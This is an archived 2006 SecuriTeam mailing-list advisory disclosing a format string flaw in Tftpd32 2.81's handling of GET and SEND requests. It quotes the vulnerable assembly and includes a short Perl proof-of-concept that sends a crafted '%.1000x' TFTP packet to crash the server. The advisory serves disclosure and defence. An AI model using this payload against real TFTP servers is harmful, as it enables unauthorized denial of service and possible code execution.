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| Subject: | [NT] Tftpd SEND and GET Format String Vulnerability |
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| Date: | 7 Feb 2006 18:21:29 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Tftpd SEND and GET Format String Vulnerability ------------------------------------------------------------------------ SUMMARY " <http://tftpd32.jounin.net/> Tftpd32 includes DHCP, TFTP, SNTP and Syslog servers as well as a TFTP client." A format string vulnerability in Tftpd32 causes DoS when a malformed SEND or GET request is received. DETAILS Vulnerable Systems: * Tftpd32 version 2.81 Due to incorrect use of format strings there is a possibility of remote code execution. You can trigger this vulnerability by sending SEND or GET request with a specially formated string. Vulnerable code: LEA ECX,DWORD PTR SS:[ESP+430] LEA EAX,DWORD PTR SS:[ESP+1C] PUSH ECX ; /Arglist PUSH EDX ; |Format PUSH EAX ; |s = 00E6F4E8 CALL DWORD PTR DS:[<&USER32.wvsprintfA>] ; \wvsprintfA Exploit: #!/usr/bin/perl # Tftpd32 Format String PoC DoS by Critical Security research http://www.critical.lt use IO::Socket; $port = "69"; $host = "127.0.0.1"; $tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp'); $bzz = "\x00\x01" ; #GET $bzz .= "%.1000x\x00"; $bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet $tftpudp->send($bzz); ADDITIONAL INFORMATION The original article can be found at: <http://www.critical.lt/?vulnerabilities/200> http://www.critical.lt/?vulnerabilities/200 Related articles: * <http://www.securiteam.com/windowsntfocus/6D00D2061G.html> TFTPD32 Directory Traversal Vulnerability * <http://www.securiteam.com/windowsntfocus/6C00C2061A.html> TFTPD32 Buffer Overflow Vulnerability (Long filename) ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
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